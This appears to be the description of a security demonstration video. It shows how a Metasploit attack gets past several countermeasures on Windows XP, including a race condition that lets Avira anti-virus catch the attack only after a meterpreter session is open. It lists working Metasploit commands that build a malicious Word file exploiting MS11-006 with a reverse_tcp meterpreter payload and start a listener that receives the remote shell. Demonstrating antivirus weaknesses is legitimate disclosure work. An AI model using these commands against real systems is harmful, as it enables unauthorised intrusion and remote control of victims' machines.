Third scenario of the Metasploit Exploitation Scenarios.
Here, the user is a standard user, protected by 5 countermeasures:
– Firewall rules that limit outbound connections to specific ports only.
– Transparent HTTP/S proxy for web surfing.
– Dual antivirus (Avira / ClamAV) scanning of web traffic (useless in this case, due to the Astaro bugs).
– Dr.Web Antivirus on the target Windows XP.
– Windows Firewall on the target Windows XP.
This video demonstrates a race condition against Avira anti-virus products. This race condition is due to design errors in the Avira anti-virus products themselves.
As you will see, the installed "Avira AntiVir Personal" anti-virus detects the attack, but too late: the meterpreter session is already created and you have access to the system.
The demonstrated product is an up-to-date "Avira AntiVir Personal", but this race condition also appears in other Avira products, such as "Avira AntiVir Premium" and "Avira Premium Security Suite".
Metasploit commands:
To create the msf.doc file exploiting the MS11-006 vulnerability
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
To listen for incoming meterpreter sessions
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set InitialAutoRunScript migrate -f
exploit -j